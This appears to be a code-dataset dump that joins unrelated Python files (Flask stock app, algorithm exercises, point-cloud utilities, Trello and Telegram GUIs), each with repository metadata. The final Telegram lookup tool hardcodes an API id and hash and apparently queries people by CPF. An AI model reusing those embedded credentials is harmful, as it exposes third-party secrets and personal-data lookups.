return "Final project for LighthouseLabs Data Science Bootcamp. The goal of the project is to use historical stock data in conjunction with sentiment analysis of news headlines and Twitter posts, to predict the future price of a stock of interest. The headlines were obtained by scraping the website, FinViz, while tweets were taken using Tweepy. Both were analyzed using the Vader Sentiment Analyzer."
@app.route('/search',methods = ['POST','GET'])
def login():
if(request.args):
company, prediction = make_prediction(request.args['ticker'])
return flask.render_template('stock.html',
company=company.upper(),
prediction=prediction)
else:
return flask.render_template('stock.html')
if __name__=="__main__":
# For local development:
app.run(debug=True)
# For public web serving:
#app.run(host='0.0.0.0')
app.run()
# if __name__ == '__main__':
# from pprint import pprint
# pprint("Checking to see what empty string predicts")
# pprint('input string is ')
# ticker = 'wmt'
# pprint(ticker)
# x_input, probs = predict_price(ticker)
# pprint(f'Input values: {x_input}')
# pprint(probs) | keatonmaruyali/LighthouseLabs_DS_Final | app.py | app.py | py | 1,686 | python | en | code | 8 | github-code | 90 |
37118933073 | # ### Ex.4: Find the Duplicate Number
# Given an array nums containing n + 1 integers
# where each integer is between 1 and n (inclusive),
# prove that at least one duplicate number must exist.
# Assume that there is only one duplicate number, find the duplicate one.
# Note:
# You must not modify the array (assume the array is read only).
# You must use only constant, O(1) extra space.
# Your runtime complexity should be less than O(n2).
# There is only one duplicate number in the array, but it could be repeated more than once.
def findDuplicate(nums):
low = 1
high = len(nums)-1
while low < high:
mid = low+(high-low)//2
count = 0
for i in nums:
if i <= mid:
count += 1
if count <= mid:
low = mid+1
else:
high = mid
return low
nums = [3, 5, 6, 3, 1, 4, 2]
print(findDuplicate(nums))
| nanw01/python-algrothm | Python Algrothm Advanced/practice/050204findDuplicate.py | 050204findDuplicate.py | py | 905 | python | en | code | 1 | github-code | 90 |
18473908389 | N, X = map(int, input().split())
ans = 0
for i in range(N, -1, -1):
if X < 2**(i + 1) - 1:
X -= 1
elif X > 2 ** (i + 1) - 1:
X -= 2 ** (i + 1) - 1
ans += 2 ** i
else:
ans += 2 ** i
break
if X == 0:
break
#print(X, ans)
print(ans) | Aasthaengg/IBMdataset | Python_codes/p03209/s610695881.py | s610695881.py | py | 300 | python | en | code | 0 | github-code | 90 |
18420027689 | # abc124_c.py
# https://atcoder.jp/contests/abc124/tasks/abc124_c
# C - Coloring Colorfully /
# 実行時間制限: 2 sec / メモリ制限: 1024 MB
# 配点 : 300点
# 問題文
# 左右一列に N枚のタイルが並んでおり、各タイルの初めの色は長さ N の文字列 Sで表されます。
# 左から i番目のタイルは、S の i番目の文字が 0 のとき黒色で、1 のとき白色で塗られています。
# あなたは、いくつかのタイルを黒色または白色に塗り替えることで、どの隣り合う 2枚のタイルも異なる色で塗られているようにしたいです。
# 最小で何枚のタイルを塗り替えることで条件を満たすようにできるでしょうか。
# 制約
# 1≤|S|≤105
# Siは 0 または 1 である。
# 入力
# 入力は以下の形式で標準入力から与えられる。
# S
# 出力
# 条件を満たすために塗り替えるタイルの枚数の最小値を出力せよ。
# 入力例 1
# 000
# 出力例 1
# 1
# 中央のタイルを白色に塗り替えれば条件を達成できます。
# 入力例 2
# 10010010
# 出力例 2
# 3
# 入力例 3
# 0
# 出力例 3
# 0
global FLAG_LOG
FLAG_LOG = False
def log(value):
# FLAG_LOG = True
# FLAG_LOG = False
if FLAG_LOG:
print(str(value))
def calculation(lines):
line = lines[0]
# N = int(lines[0])
# values = list(map(int, lines[0].split()))
# values = list(map(int, lines[1].split()))
# values = list(map(int, lines[1].split()))
# values = list()
# for i in range(6):
# values.append(int(lines[i]))
# valueses = list()
# for i in range(Q):
# valueses.append(list(map(int, lines[i+1].split())))
result = 0
n_even_kuro = 0
n_even_shiro = 0
n_odd_kuro = 0
n_odd_shiro = 0
# まず観察
for i, char in enumerate(line):
if i % 2 == 0:
if char == '0':
n_even_kuro += 1
else:
n_even_shiro += 1
else:
if char == '0':
n_odd_kuro += 1
else:
n_odd_shiro += 1
log(n_even_kuro)
log(n_even_shiro)
log(n_odd_kuro)
log(n_odd_shiro)
# 偶数・奇数それぞれ、黒白どちらが多いかを判断
dif_even_kuro = n_even_kuro - n_even_shiro
dif_odd_kuro = n_odd_kuro - n_odd_shiro
# 偶数=黒/奇数=白 or 偶数=白/奇数=黒 を判断
if dif_even_kuro > dif_odd_kuro:
# 偶数=黒/奇数=白
result = n_even_shiro + n_odd_kuro
else:
# 偶数=白/奇数=黒
result = n_odd_shiro + n_even_kuro
return [result]
# 引数を取得
def get_input_lines(lines_count):
lines = list()
for _ in range(lines_count):
lines.append(input())
return lines
# テストデータ
def get_testdata(pattern):
if pattern == 1:
lines_input = ['000']
lines_export = [1]
if pattern == 2:
lines_input = ['10010010']
lines_export = [3]
if pattern == 3:
lines_input = ['0']
lines_export = [0]
return lines_input, lines_export
# 動作モード判別
def get_mode():
import sys
args = sys.argv
global FLAG_LOG
if len(args) == 1:
mode = 0
FLAG_LOG = False
else:
mode = int(args[1])
FLAG_LOG = True
return mode
# 主処理
def main():
import time
started = time.time()
mode = get_mode()
if mode == 0:
lines_input = get_input_lines(1)
else:
lines_input, lines_export = get_testdata(mode)
lines_result = calculation(lines_input)
for line_result in lines_result:
print(line_result)
# if mode > 0:
# print(f'lines_input=[{lines_input}]')
# print(f'lines_export=[{lines_export}]')
# print(f'lines_result=[{lines_result}]')
# if lines_result == lines_export:
# print('OK')
# else:
# print('NG')
# finished = time.time()
# duration = finished - started
# print(f'duration=[{duration}]')
# 起動処理
if __name__ == '__main__':
main()
| Aasthaengg/IBMdataset | Python_codes/p03073/s890499377.py | s890499377.py | py | 4,180 | python | ja | code | 0 | github-code | 90 |
18333051919 | S = list(input())
K = int(input())
if len(set(S)) == 1:
print(len(S)*K //2)
else:
cnt = [1]
for i in range(len(S)-1):
if S[i] == S[i+1]:
cnt[-1] += 1
else:
cnt.append(1)
res = 0
for c in cnt:
res += c//2*K
if S[0] == S[-1]:
if (cnt[0]+cnt[-1])%2 == 0:
res += K-1
print(res) | Aasthaengg/IBMdataset | Python_codes/p02891/s110231061.py | s110231061.py | py | 381 | python | en | code | 0 | github-code | 90 |
30159940885 | def is_prime(num):
if num==2:
return True
for i in range(2,num):
if num%i==0:
return False
return True
def prime_range(num):
for i in range(2,num+1):
if is_prime(i):
yield i
def prime_factors(num):
lst = []
i = 2
while num>1:
if num%i:
i+=1
else:
num//=i
lst.append(i)
return lst | JakAsAlways/prime_package | funcs.py | funcs.py | py | 414 | python | en | code | 0 | github-code | 90 |
43057812930 | import os
import time
import torch
import numpy as np
import open3d as o3d
from PIL import Image
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self):
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0.0
self.sq_sum = 0.0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
self.sq_sum += val**2 * n
self.var = self.sq_sum / self.count - self.avg**2
class Timer(object):
"""A simple timer."""
def __init__(self, binary_fn=None, init_val=0):
self.total_time = 0.
self.calls = 0
self.start_time = 0.
self.diff = 0.
self.binary_fn = binary_fn
self.tmp = init_val
def reset(self):
self.total_time = 0
self.calls = 0
self.start_time = 0
self.diff = 0
@property
def avg(self):
return self.total_time / self.calls
def tic(self):
# using time.time instead of time.clock because time time.clock
# does not normalize for multithreading
self.start_time = time.time()
def toc(self, average=True):
self.diff = time.time() - self.start_time
self.total_time += self.diff
self.calls += 1
if self.binary_fn:
self.tmp = self.binary_fn(self.tmp, self.diff)
if average:
return self.avg
else:
return self.diff
class nn_match():
def __init__(self, nn_max_n = 500) -> None:
self.nn_max_n = nn_max_n
def pdist(self, A, B, dist_type='L2'):
if dist_type == 'L2':
D2 = torch.sum((A.unsqueeze(1) - B.unsqueeze(0)).pow(2), 2)
return torch.sqrt(D2 + 1e-7)
elif dist_type == 'SquareL2':
return torch.sum((A.unsqueeze(1) - B.unsqueeze(0)).pow(2), 2)
else:
raise NotImplementedError('Not implemented')
def find_nn_gpu(self, F0, F1, nn_max_n=-1, return_distance=False, dist_type='SquareL2'):
# Too much memory if F0 or F1 large. Divide the F0
if nn_max_n > 1:
N = len(F0)
C = int(np.ceil(N / nn_max_n))
stride = nn_max_n
dists, inds = [], []
for i in range(C):
dist = self.pdist(F0[i * stride:(i + 1) * stride], F1, dist_type=dist_type)
min_dist, ind = dist.min(dim=1)
dists.append(min_dist.detach().unsqueeze(1).cpu())
inds.append(ind.cpu())
if C * stride < N:
dist = self.pdist(F0[C * stride:], F1, dist_type=dist_type)
min_dist, ind = dist.min(dim=1)
dists.append(min_dist.detach().unsqueeze(1).cpu())
inds.append(ind.cpu())
dists = torch.cat(dists)
inds = torch.cat(inds)
assert len(inds) == N
else:
dist = self.pdist(F0, F1, dist_type=dist_type)
min_dist, inds = dist.min(dim=1)
dists = min_dist.detach().unsqueeze(1).cpu()
inds = inds.cpu()
if return_distance:
return inds, dists
else:
return inds
def find_knn_gpu(self, F0, F1, nn_max_n=-1, k=2, return_distance=False, dist_type='SquareL2'):
# Too much memory if F0 or F1 large. Divide the F0
if nn_max_n > 1:
N = len(F0)
C = int(np.ceil(N / nn_max_n))
stride = nn_max_n
dists, inds = [], []
for i in range(C):
dist = self.pdist(F0[i * stride:(i + 1) * stride], F1, dist_type=dist_type)
min_dist, ind = torch.topk(-dist, k, dim=1)
dists.append(-min_dist.detach().unsqueeze(1).cpu())
inds.append(ind.cpu())
if C * stride < N:
dist = self.pdist(F0[C * stride:], F1, dist_type=dist_type)
min_dist, ind = torch.topk(-dist, k, dim=1)
dists.append(-min_dist.detach().unsqueeze(1).cpu())
inds.append(ind.cpu())
dists = torch.cat(dists,dim=0)
inds = torch.cat(inds,dim=0)
assert len(inds) == N
else:
dist = self.pdist(F0, F1, dist_type=dist_type)
min_dist, inds = torch.topk(-dist, k, dim=1)
dists = -min_dist.detach().unsqueeze(1).cpu()
inds = inds.cpu()
if return_distance:
return inds, dists
else:
return inds
def find_corr(self, F0, F1, subsample_size=-1, mutual = True):
#init
inds0, inds1 = np.arange(F0.shape[0]), np.arange(F1.shape[0])
if subsample_size > 0:
N0 = min(len(F0), subsample_size)
N1 = min(len(F1), subsample_size)
inds0 = np.random.choice(len(F0), N0, replace=False)
inds1 = np.random.choice(len(F1), N1, replace=False)
F0, F1 = F0[inds0], F1[inds1]
# Compute the nn
nn_inds_in1 = self.find_nn_gpu(F0, F1, nn_max_n=self.nn_max_n)
if not mutual:
inds1 = inds1[nn_inds_in1]
else:
matches = []
nn_inds_in0 = self.find_nn_gpu(F1, F0, nn_max_n=self.nn_max_n)
for i in range(len(nn_inds_in1)):
if i == nn_inds_in0[nn_inds_in1[i]]:
matches.append((i, nn_inds_in1[i]))
matches = np.array(matches).astype(np.int32)
inds0 = inds0[matches[:,0]]
inds1 = inds1[matches[:,1]]
return inds0, inds1
class dpt_3d_convert():
def __init__(self):
pass
def to_harmonic(self, input):
M = input.shape[0]
input = np.concatenate([input, np.ones([M,1])],axis=1)
return input
def proj_2to3(self, uv, depth, intrinsic, extrinsic, depth_unit = 1000):
# input:
# uv M*2 the image coordinates of predicted pairs on sample image
# depth M the depth of the matched voxels of sample image
# intrinsic 3*3 the intrinsic matrix
# extrinsic 4*4 the extrinsic matrix the the sample/depth image
# output:
# the corresponding depth of the matched pixels on the sample image
# formula xyz = extrinsic@(inv(intrinsic)@uvd)
uv_harmonic = self.to_harmonic(uv)
uv_harmonic = uv_harmonic * depth[:,None]/depth_unit
camera_coor = (np.linalg.inv(intrinsic) @ uv_harmonic.T).T
camera_coor = self.to_harmonic(camera_coor)
world_coor = (extrinsic @ camera_coor.T).T
return world_coor[:,0:3]
def proj_3to2(self, xyz, intrinsic, extrinsic):
# input:
# xyz M*3 the xyz points
# depth M the depth of the matched voxels of sample image
# intrinsic 3*3 the intrinsic matrix
# extrinsic 4*4 the extrinsic matrix the the sample/depth image
# output:
# the corresponding depth of the matched pixels on the sample image
# formula uvd=intrinsic(inv(extrinsic)@xyz)
xyz = self.to_harmonic(xyz)
xyz = np.linalg.inv(extrinsic) @ xyz.T
uvd = intrinsic @ xyz[0:3]
uvd = uvd.T
uv, d = uvd[:,0:2]/(uvd[:,-1:]+1e-5), uvd[:,-1]
return uv, d
def proj_depth(self, depth, intrinsic, extrinsic = np.eye(4), depth_unit = 1000,
filter_edge = False, window_s = 3, max_range = 0.2,
return_uv = False,
filter_far = False, far_thres = 80,
filter_near = False, near_thres = 0.01):
if depth.ndim>2:
depth = depth[:,:,0]
h, w = depth.shape[0:2]
u = np.arange(w)[None,:,None].repeat(h,axis=0)
v = np.arange(h)[:,None,None].repeat(w,axis=1)
uvd = np.concatenate([u, v, depth[:,:,None]],axis=-1)
# condeuct mask
if filter_edge:
mask = np.zeros_like(depth)
for i in range(window_s, h):
for j in range(window_s, w):
check = depth[(i-window_s):(i+window_s), (j-window_s):(j+window_s)] / depth_unit
check = np.max(check) - np.min(check)
if check < max_range:
mask[i,j] = 1
uvd = uvd[mask>0.5]
uvd = uvd.reshape(-1,3)
if filter_far:
uvd = uvd[uvd[:,-1]<far_thres*depth_unit]
if filter_near:
uvd = uvd[uvd[:,-1]>near_thres*depth_unit]
pc = self.proj_2to3(uvd[:,0:2], uvd[:,-1], intrinsic, extrinsic, depth_unit)
if return_uv:
return uvd[:,0:2], uvd[:,-1], pc
else:
return pc
def proj_pc2dpt(self, ply, extrinsic, intrinsic, h, w):
if type(ply) is not np.ndarray:
ply = np.array(ply.points)
uv, dpt = self.proj_3to2(ply, intrinsic, extrinsic)
mask_w = (uv[:,0]<w) & (uv[:,0]>=0)
mask_h = (uv[:,1]<h) & (uv[:,1]>=0)
# mask mask off the back-project points
mask_d = dpt>0.05
mask = mask_h & mask_w & mask_d
uv = uv[mask].astype(np.int32)
dpt = dpt[mask]
result = np.ones([h,w])*10000
for i in range(uv.shape[0]):
u,v = uv[i]
d = dpt[i]
result[v,u] = min(result[v,u],d)
result[result>9999] = 0.0
return result
class suppress_stdout_stderr(object):
'''
Avoid terminal output of diffusion processings!
A context manager for doing a "deep suppression" of stdout and stderr in
Python, i.e. will suppress all print, even if the print originates in a
compiled C/Fortran sub-function.
This will not suppress raised exceptions, since exceptions are printed
to stderr just before a script exits, and after the context manager has
exited (at least, I think that is why it lets exceptions through).
'''
def __init__(self):
# Open a pair of null files
self.null_fds = [os.open(os.devnull, os.O_RDWR) for x in range(2)]
# Save the actual stdout (1) and stderr (2) file descriptors.
self.save_fds = (os.dup(1), os.dup(2))
def __enter__(self):
# Assign the null pointers to stdout and stderr.
os.dup2(self.null_fds[0], 1)
os.dup2(self.null_fds[1], 2)
def __exit__(self, *_):
# Re-assign the real stdout/stderr back to (1) and (2)
os.dup2(self.save_fds[0], 1)
os.dup2(self.save_fds[1], 2)
# Close the null files
os.close(self.null_fds[0])
os.close(self.null_fds[1])
def points_to_hpoints(points):
n,_=points.shape
return np.concatenate([points,np.ones([n,1])],1)
def hpoints_to_points(hpoints):
return hpoints[:,:-1]/hpoints[:,-1:]
def transform_points(pts,transform):
h,w=transform.shape
if h==3 and w==3:
return pts @ transform.T
if h==3 and w==4:
return pts @ transform[:,:3].T + transform[:,3:].T
elif h==4 and w==4:
return hpoints_to_points(points_to_hpoints(pts) @ transform.T)
else: raise NotImplementedError
def random_rotation_matrix():
"""
Generates a random 3D rotation matrix from axis and angle.
Args:
numpy_random_state: numpy random state object
Returns:
Random rotation matrix.
"""
rng = np.random.RandomState()
axis = rng.rand(3) - 0.5
axis /= np.linalg.norm(axis) + 1E-8
theta = np.pi * rng.uniform(0.0, 1.0)
thetas=axis*theta
alpha=thetas[0]
beta=thetas[1]
gama=thetas[2]
Rzalpha=np.array([[np.cos(alpha),np.sin(alpha),0],
[-np.sin(alpha),np.cos(alpha),0],
[0,0,1]])
Rybeta=np.array([[np.cos(beta),0,-np.sin(beta)],
[0,1,0],
[np.sin(beta),0,np.cos(beta)]])
Rzgama=np.array([[np.cos(gama),np.sin(gama),0],
[-np.sin(gama),np.cos(gama),0],
[0,0,1]])
R=np.matmul(Rzgama,np.matmul(Rybeta,Rzalpha))
return R
def random_se3():
T = np.eye(4)
T[0:3,0:3] = random_rotation_matrix()
t = np.random.rand(3)-0.5
T[0:3,-1] = t*1000
return T
def make_open3d_point_cloud(xyz, color=None):
if not hasattr(xyz,'ndim'):
return xyz
pcd = o3d.geometry.PointCloud()
pcd.points = o3d.utility.Vector3dVector(xyz)
if color is not None:
pcd.color = o3d.utility.Vector3dVector(color)
return pcd
def trans_gt_for_kitti(gt):
r = gt[0:3,0:3]
r = r[[0,2,1]]
r = r[:,[0,2,1]]
gt[0:3,0:3] = r
t = gt[0:3,-1:]
t[1]*=-1
t = t[[2,1,0]]
gt[0:3,-1:] = t
return gt
def save_depth(dpt_fn,dpt,scale=1):
dpt = dpt * scale
dpt = dpt.astype(np.uint16)
dpt = Image.fromarray(dpt)
dpt.save(dpt_fn) | WHU-USI3DV/FreeReg | utils/utils.py | utils.py | py | 12,696 | python | en | code | 73 | github-code | 90 |
17984731889 | s = input()
se = set(list(s))
# print('se', se)
if len(se) == 1:
print(0)
exit()
def f(v):
s_list = s.split(v)
s_list = [len(i) for i in s_list if i]
return max(s_list)
ans = 1000
for i in se:
v = f(i)
ans = min(ans, v)
print(ans)
# serval 6,1
# srvvl 5,2
# 4,3
# → svvv → vvv
# jackal
# aacaa
# jaajjj
# aaajj
# aaaj
# aaa
# jajjjjjjjajjjjjjjjjj
# aajjjjjjaajjjjjjjjj
# aajjjjjaaajjjjjjjj
# aajjjjaaaajjjjjjj
# ...
| Aasthaengg/IBMdataset | Python_codes/p03687/s684323459.py | s684323459.py | py | 466 | python | en | code | 0 | github-code | 90 |
43855201560 | import PySimpleGUI as sg
class Widget:
"""ウィジェットを定義"""
@staticmethod
def relief():
"""リリーフ"""
return sg.T(text='Trello GUI',
size=(30, 1),
justification='center',
font=("Helvetica", 20),
relief=sg.RELIEF_RIDGE)
@staticmethod
def label(text: str, width: int = None):
"""ラベル的なテキストボックス"""
if not width:
width = len(text) + 1
return sg.T(text, (width, 1))
@staticmethod
def combo(key, values=None, enable_events=True):
"""コンボボックス"""
if not values:
values = []
return sg.Combo(values=values,
size=(25, 1),
key=key,
enable_events=enable_events)
@staticmethod
def input(key: str, width: int, height: int = 1):
"""インプットテキスト"""
return sg.InputText('', size=(width, height), key=key)
@staticmethod
def textarea(key: str, height: int, width: int = 35):
"""mline"""
return sg.MLine('', size=(width, height), key=key)
@staticmethod
def button(text: str, key: str):
"""ボタン"""
return sg.Button(text, key=key)
class Frontend(Widget):
"""GUIの見た目を定義"""
def column_choice(self):
"""ボードとリストの選択エリア"""
left = sg.Column(layout=[[self.label('Board')],
[self.label('List')]])
right = sg.Column(layout=[[self.combo(key='BOARD_NAME')],
[self.combo(key='LIST_NAME')]])
return sg.Column([
[left, right]
], size=(280, 70))
def frame_import(self):
"""インポートボタンフレーム"""
return sg.Frame('Import', layout=[[self.button(text='Excel', key='IMPORT_EXCEL')]])
def frame_export(self):
"""エクスポートボタンフレーム"""
return sg.Frame('Export', layout=[[self.button('Excel', key='EXPORT_EXCEL')]])
def frame_add_card(self):
"""カード追加フレーム"""
col1 = [[self.label(text='due date', width=10)],
[self.input(width=10, key="DUE_DATE")]]
col2 = [[self.label(text='time', width=10)],
[self.input(width=10, key="DUE_TIME")]]
return sg.Frame('Add Card', [
[self.label('Card Name')],
[self.textarea(key="CARD_NAME", height=2)],
[self.label('Description')],
[self.textarea(key="DESC", height=2)],
[sg.Column(col1), sg.Column(col2)],
[self.button(text='ADD', key="ADD_CARD")]
], vertical_alignment='top', size=(300, 280))
def frame_debug_print(self):
"""デバッグ出力フレーム"""
return sg.Frame('Debug', [
[self.button(text='Clear', key='CLEAR_DEBUG')],
[self.textarea(height=4, key='DEBUG_PRINT')]
], size=(300, 120))
def frame_card_print(self):
"""カード内容プリントフレーム"""
return sg.Frame('Print Card', [
[self.button(text='All Card in Board', key='ALL_LIST_PRINT'),
self.button(text='Just Selected List', key='SELECTED_LIST_PRINT')],
[self.textarea(key='PREVIEW', width=30, height=20)]
])
def layout(self):
left = sg.Column(layout=[
[self.column_choice()],
[self.frame_add_card()],
[self.frame_debug_print()]
])
right = sg.Column(layout=[
[self.frame_export(), self.frame_import()],
[self.frame_card_print()]], vertical_alignment='t')
layout = [[self.relief()],
[left, right]]
return layout
def window(self):
return sg.Window(title='for Trello...',
size=(600, 600),
finalize=True,
layout=self.layout())
| qlitre/pysimplegui-trello | frontend.py | frontend.py | py | 4,066 | python | en | code | 3 | github-code | 90 |
23561187884 | """
- Author: Sharif Ehsani
- Date: December 2020
- https://github.com/sharifehsani
In the Spotlight:
Set Operations
In this section you will look at Program 10-3, which demonstrates various set operations.
The program creates two sets: one that holds the names of students on the baseball team
and another that holds the names of students on the basketball team. The program then
performs the following operations:
• It finds the intersection of the sets to display the names of students who play both
sports.
• It finds the union of the sets to display the names of students who play either sport.
• It finds the difference of the baseball and basketball sets to display the names of students
who play baseball but not basketball.
• It finds the difference of the basketball and baseball (basketball – baseball) sets to display
the names of students who play basketball but not baseball. It also finds the difference
of the baseball and basketball (baseball – basketball) sets to display the names
of students who play baseball but not basketball.
• It finds the symmetric difference of the basketball and baseball sets to display the
names of students who play one sport but not both.
"""
# function to add and create baseball team
def baseball_team_method(baseball_team):
# declare a counter variable
print()
print("First enter the names of students for baseball team.")
more = 'y'
while (more == 'y'):
# get the user to input the name
name = input("Enter the name of student in the baseball team: ")
# check if the name alaready exist because sets can't have duplicate elements
# if name already in the set get another name
if (name in baseball_team):
print(name, "already exist in the set and sets can't have duplicate elements.")
name = input("Enter a different name: ")
baseball_team.add(name)
# if name does not exist add it to the set
else:
baseball_team.add(name)
# ask the user if s/he wants to add more
more = input("Do you want to add more? 'y' = yes, 'n' = no: ")
# return the set
return baseball_team
# function to populate basketball team
def basketball_team_method(basketball_team):
# do the same as above and get students names for basketbal team
print()
print("Now enter the names of students for basketbal team.")
add_more = 'y'
while (add_more == 'y'):
# get the user to input the name
name = input("Enter the name of student in the baseball_team team: ")
# check if the name alaready exist because sets can't have duplicate elements
# if name already in the set get another name
if (name in basketball_team):
print(name, "already exist in the set and sets can't have duplicate elements.")
name = input("Enter a different name: ")
basketball_team.add(name)
# if name does not exist add it to the set
else:
basketball_team.add(name)
# ask the user if s/he wants to add more
add_more = input("Do you want to add more? 'y' = yes, 'n' = no: ")
# return the set
return basketball_team
# function to find the intersection of the sets to display the names of students who play both sport
def intersection_method(baseball, basketball):
# take the intersection of both sets
intersection_set = baseball.intersection(basketball)
#print the result
print()
print("The follwoing students play in both teams:")
for name in intersection_set:
print(name, end=', ')
# function to finds the union of the sets to display the names of students who play either sport
def union_method(baseball, basketball):
# take the union of both sets
union = baseball.union(basketball)
#print the result
print()
print("The follwoing students play in either baseball or basketball teams:")
for name in union:
print(name, end=', ')
# function to finds the difference of the baseball and basketball sets to display the names of students
# who play baseball but not basketball.
def difference_method(baseball, basketball):
# take the difference baseball - basketball
diff_base = baseball.difference(basketball)
# dsiplay the result
print()
print("The follwoing students play in baseball team but not in basketball team:")
for name in diff_base:
print(name, end=', ')
# take the differnce (basketball - baseball)
diff_basket = basketball.difference(baseball)
# dsiplay the result
print()
print("The follwoing students play in basketball team but not in baseball team:")
for name in diff_basket:
print(name, end=', ')
# function to finds the symmetric difference of the basketball and baseball sets to display the
# names of students who play one sport but not both
def sym_dif(baseball, basketball):
# take the symetric difference of the two sets
sym = baseball.symmetric_difference(basketball)
# dsiplay the result
print()
print("The follwoing students play only in one team:")
for name in sym:
print(name, end=', ')
# main function to start the program
def main():
# declare two empty sets and get the user to populate the set
baseball_team = set()
basketball_team = set()
# call bothe the function to creat the sets
baseball = baseball_team_method(baseball_team)
basketball = basketball_team_method(basketball_team)
# call the intersection method to take the intersection of the sets
intersection_method(baseball, basketball)
# call the union_method to take the union of both sets
union_method(baseball, basketball)
# call the difference method to take the difference of both sets
difference_method(baseball, basketball)
# call the sym_dif method to take the symetric differnce of both sets
sym_dif(baseball, basketball)
# call the main function
main()
| sharifehsani/starting-out-with-python | chapter10/set_operation.py | set_operation.py | py | 5,617 | python | en | code | 0 | github-code | 90 |
34887661468 | from telethon import TelegramClient, events, sync
from tkinter import *
import tkinter
import time
import asyncio
import wckToolTips
from PIL import ImageTk, Image
# DEFINITIONS
HEIGHT = 300
WIDTH = 750
root = Tk()
root.title("M.E. Consultas")
# root.iconbitmap('ME.png')
canvas = Canvas(root, height=HEIGHT, width=WIDTH)
canvas.pack()
# MAIN FRAMES
logo_img = ImageTk.PhotoImage(Image.open("ME.png"))
frame_logo = Label(root, image=logo_img)
frame_logo.place(relx=0.5, rely=0.02, height=80, width=350, anchor='n')
# frame_user = Frame(root, borderwidth=2, relief="groove")
# frame_user.place(x=72, rely=0.02, height=135, width=130, anchor='n')
frame_cpf = Frame(root, borderwidth=2, relief="groove")
frame_cpf.place(relx=0.5, rely=0.3, height=35, width=250, anchor='n')
frame_nome = Frame(root, borderwidth=2, relief="groove")
frame_nome.place(relx=0.5, rely=0.425, height=25, width=300, anchor='n')
frame_semafaro = Frame(root)
frame_semafaro.place(relx=0.715, rely=0.425, height=25, width=25, anchor='n')
frame_top_infos = Frame(root)
frame_top_infos.place(relx=0.5, rely=0.52, height=20, relwidth=1, anchor='n')
frame_infos = Frame(root)
frame_infos.place(relx=0.5, rely=0.60, height=115, relwidth=0.99, anchor='n')
# INFOS COLUMNS
frame_idade = Frame(frame_infos)
frame_idade.columnconfigure(0, weight=1)
frame_idade.place(relx=0.024, height=120, relwidth=0.05, anchor='n')
frame_nbenef = Frame(frame_infos)
frame_nbenef.columnconfigure(0, weight=1)
frame_nbenef.place(relx=0.0784, height=120, relwidth=0.0585, anchor='n')
frame_salario = Frame(frame_infos)
frame_salario.columnconfigure(0, weight=1)
frame_salario.place(relx=0.1508, height=120, relwidth=0.085, anchor='n')
# frame_data = Frame(frame_infos, bg='blue')
# frame_data.columnconfigure(0, weight=1)
# frame_data.place(relx=0.213, height=120, relwidth=0.068, anchor='n')
frame_cidade = Frame(frame_infos)
frame_cidade.columnconfigure(0, weight=1)
frame_cidade.place(relx=0.26, height=120, relwidth=0.13, anchor='n')
frame_bancos = Frame(frame_infos)
frame_bancos.columnconfigure(0, weight=1)
frame_bancos.place(relx=0.4926, height=120, relwidth=0.332, anchor='n')
frame_qnt = Frame(frame_infos)
frame_qnt.columnconfigure(0, weight=1)
frame_qnt.place(relx=0.682, height=120, relwidth=0.0475, anchor='n')
frame_card = Frame(frame_infos)
frame_card.columnconfigure(0, weight=1)
frame_card.place(relx=0.755, height=120, relwidth=0.096, anchor='n')
frame_mgconsig = Frame(frame_infos)
frame_mgconsig.columnconfigure(0, weight=1)
frame_mgconsig.place(relx=0.8515, height=120, relwidth=0.097, anchor='n')
frame_mgcard = Frame(frame_infos)
frame_mgcard.columnconfigure(0, weight=1)
frame_mgcard.place(relx=0.949, height=120, relwidth=0.0975, anchor='n')
# MAIN CELLS
nome_cell = Label(frame_nome, text='NOME:')
nome_cell.grid(row=0, column=0)
idade_cell = Label(frame_top_infos, text='IDADE', borderwidth=2, relief="groove")
idade_cell.place(relx=0.056, y=10, relwidth=0.05, anchor='e')
nbenef_cell = Label(frame_top_infos, text='BENEF.', borderwidth=2, relief="groove")
nbenef_cell.place(relx=0.114, y=10, relwidth=0.06, anchor='e')
salario_cell = Label(frame_top_infos, text='SALÁRIO', borderwidth=2, relief="groove")
salario_cell.place(relx=0.198, y=10, relwidth=0.085, anchor='e')
# data_cell = Label(frame_top_infos, text='DATA', borderwidth=2, relief="groove")
# data_cell.place(relx=0.255, y=10, relwidth=0.0725, anchor='e')
cidade_cell = Label(frame_top_infos, text='AGENCIA', borderwidth=2, relief="groove")
cidade_cell.place(relx=0.329, y=10, relwidth=0.131, anchor='e')
bancos_cell = Label(frame_top_infos, text='BANCOS', borderwidth=2, relief="groove")
bancos_cell.place(relx=0.659, y=10, relwidth=0.331, anchor='e')
qnt_cell = Label(frame_top_infos, text='QNT.', borderwidth=2, relief="groove")
qnt_cell.place(relx=0.708, y=10, relwidth=0.05, anchor='e')
bcard_cell = Label(frame_top_infos, text='CARD', borderwidth=2, relief="groove")
bcard_cell.place(relx=0.805, y=10, relwidth=0.1, anchor='e')
mgconsig_cell = Label(frame_top_infos, text='MG. CONSIG', borderwidth=2, relief="groove")
mgconsig_cell.place(relx=0.9, y=10, relwidth=0.1, anchor='e')
mgcard_cell = Label(frame_top_infos, text='MG. CARD', borderwidth=2, relief="groove")
mgcard_cell.place(relx=0.996, y=10, relwidth=0.1, anchor='e')
# # USER ENTRY
# user = Label(frame_user, text='Usuário:')
# user.place(relx=0.2, rely=0.02, anchor='n', height=20, width=45)
#
# user_entry = Entry(frame_user)
# user_entry.place(relx=0.68, rely=0.02, anchor='n', height=18, width=75)
#
# passw = Label(frame_user, text='Senha:')
# passw.place(relx=0.180, rely=0.17, anchor='n', height=20, width=40)
#
# passw_entry = Entry(frame_user, show="*")
# passw_entry.place(relx=0.68, rely=0.18, anchor='n', height=18, width=75)
# CLIENTE CODE ENTRY
cpf_entry = Entry(frame_cpf)
cpf_entry.place(relx=0.01, rely=0.03, height=26, width=170)
# TELEGRAM SETUP
api_id = 1311637
api_hash = '149718fbbd581b34c98c8a214b997222'
client = TelegramClient('session_name', api_id, api_hash)
client.start()
def send_telegram():
# CLEAN PREVIOUS SEARCHES
for widget in frame_idade.winfo_children():
widget.destroy()
for widget in frame_nbenef.winfo_children():
widget.destroy()
for widget in frame_salario.winfo_children():
widget.destroy()
# for widget in frame_data.winfo_children():
# widget.destroy()
for widget in frame_cidade.winfo_children():
widget.destroy()
for widget in frame_bancos.winfo_children():
widget.destroy()
for widget in frame_qnt.winfo_children():
widget.destroy()
